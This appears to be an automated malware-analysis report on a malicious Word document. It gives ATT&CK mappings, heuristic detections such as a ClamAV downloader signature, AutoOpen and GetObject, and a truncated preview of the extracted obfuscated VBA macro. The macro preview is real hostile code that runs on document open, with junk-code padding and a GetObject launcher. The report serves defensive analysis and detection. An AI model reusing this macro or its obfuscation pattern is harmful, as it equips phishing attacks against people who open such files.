MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine and the 'GetObject' call within the VBA p-code indicate an attempt to execute code upon opening. The presence of the 'Doc.Downloader' ClamAV signature strongly suggests the macro's purpose is to download and execute a secondary payload, aligning with the 'Spearphishing Attachment' initial access technique.
Heuristics 7
-
ClamAV: Doc.Downloader.00536d-6931472-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6931472-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27885 bytes |
SHA-256: f561bcfe455869839ccc04cd3f8175b78788af7a776c67812b2d9be8e1742f9a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "YQAQAAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jAwBUUw"
Attribute VB_Base = "0{B12F6CD3-1BA0-483A-889A-52D95D66E372}{19E70670-5AC4-4964-A14B-D1E4884439F8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "uADAUo"
Attribute VB_Base = "0{19AF7467-1988-4E19-958C-7E68DBD3E749}{962C1FD2-9142-43B5-875A-54C8F31868DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UkAkBC"
Function mDQGXA()
If 926485745 = 104447378 Then
For bGGDAD = oUAC4G1G To F_QwAUw
DAZQAA _
= 45914879 / Rnd(VAQxBc) + 906288282 * _
CStr(kADDwA) * 354956876 - Oct(999726634 * _
Fix(583496893) / 527800086 + Int(wkkAx4)) _
- iZBBAAAA + 78461666 - 908481086 + 805474922 - (kQkDckAA - 153169644)
Next
End If
If 523693969 = 187519467 Then
For NQBAAxQ = zXAGCA1A To M_AAUA
YAcQ4A _
= 274495506 / Rnd(iAAAAxBc) + 945797859 * _
CStr(PBZ_xX) * 757829632 - Oct(906106008 * _
Fix(991047477) / 501170525 + Int(KAAAQ_B)) _
- LZUABAA + 456781937 - 424309911 + 58067212 - (iA4AZZA - 382119161)
Next
End If
End Function
Sub autoopen()
v1oBAUDA
End Sub
Function v1oBAUDA()
On Error Resume Next
If 427055496 = 105884492 Then
For ZBAUAAww = uAAAkkA To wBA_QwX
OAADXUQk _
= 407987784 / Rnd(ZBADQAU) + 409152108 * _
CStr(jUc_UD) * 849782936 - Oct(91938495 * _
Fix(261903404) / 184014953 + Int(UCX4QA)) _
- zAAAADB1 + 923820457 - 615395877 + 505713965 - (bAACo_ - 619968095)
Next
End If
If 911574512 = 133808744 Then
For NUXX_k = VcA4DA4c To B4wA4k
MQQoBAAQ _
= 258119796 / Rnd(jQcXkAUD) + 667193569 * _
CStr(RxAAkU) * 890312154 - Oct(608281020 * _
Fix(765110002) / 81685840 + Int(tDkQkAQ)) _
- jDAUAUk + 600922462 - 225555819 + 747148761 - (H_QAkA - 426980300)
Next
End If
If 919065425 = 165568405 Then
For MXBAwA = pQBAwU To hAwACD
I4cCAG _
= 98719729 / Rnd(ZBAUDZ) + 527400093 * _
CStr(CAADUoUB) * 418284322 - Oct(183612167 * _
Fix(944353607) / 974110703 + Int(bZA4BBDk)) _
- sAAcA1 + 237702986 - 693814704 + 882813531 - (jADADQ - 312099124)
Next
End If
Set CDAAAAB = GetObject(jAwBUUw.bA4CoCAA.Text + uADAUo.cAQB1CcU + jAwBUUw.bA4CoCAA)
If 655797196 = 986016277 Then
For XUAAABA = X1QxXA To NCxABAo
fQkDAAU _
= 35732998 / Rnd(m_Zk_oA) + 563370473 * _
CStr(pXCGDU) * 22701266 - Oct(410623260 * _
Fix(935811902) / 895297027 + Int(hBwAwwQ)) _
- zQcACA + 826228280 - 557865643 + 786321699 - (UDQA4AxA - 880592925)
Next
End If
If 412059254 = 327365896 Then
For jQ4A_U = nAxBUDXB To VQ1ocZ
u_DAAXxA _
= 135620214 / Rnd(jDBGcUGx) + 157153637 * _
CStr(SAAkABA) * 803087115 - Oct(527022232 * _
Fix(91292782) / 610840131 + Int(IDAQBBw)) _
- w4CBo1ZA + 472893451 - 292187756 + 37969134 - (dcxAAk - 332533099)
Next
End If
If 602194870 = 684119939 Then
For zQUAokAA = jACBkA To OBcA1UUA
jACAxCB _
= 36061538 / Rnd(zQADAoAU) + 786759115 * _
CStr(BoQU1CA) * 512123459 - Oct(703706042 * _
Fix(859166347) / 569842305 + Int(JA1AAxc)) _
- HoZDAcU + 57260061 - 986484904 + 529082513 - (f_AUAc - 802228813)
Next
End If
If 514514 = 514514 Then
If 762694263 = 243565106 Then
For qAk4ZZB = QxDDAAA To Fx4AXoG
fcxQAcoo _
= 670002756 / Rnd(KAAQkBoB) + 396399619 * _
CStr(BBkkAo) * 773049858 - Oct(567718994 * _
Fix(226972373) / 924991597 + Int(MC4QDD_X)) _
- jAXoACA + 29113698 - 831793367 + 972764645 - (zXAQAxD - 102283763)
Next
End If
If
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.